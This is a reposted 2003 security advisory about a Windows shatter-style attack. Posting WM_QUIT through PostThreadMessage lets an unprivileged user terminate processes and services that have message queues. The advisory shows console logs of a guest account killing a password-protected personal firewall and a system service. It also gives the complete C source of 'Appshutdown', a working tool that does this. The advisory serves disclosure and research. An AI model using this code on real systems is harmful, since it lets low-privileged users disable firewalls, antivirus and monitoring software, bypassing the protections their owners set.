[seguridad]. Potencialmente muy peligroso.

= Process Killing - Playing with PostThreadMessage
= brett.moore@security-assessment.com
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% brett.moore@security-assessment.com");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =

From our testing, any process that implements a message queue is vulnerable

to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS
jmtella@compuserve.com

Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.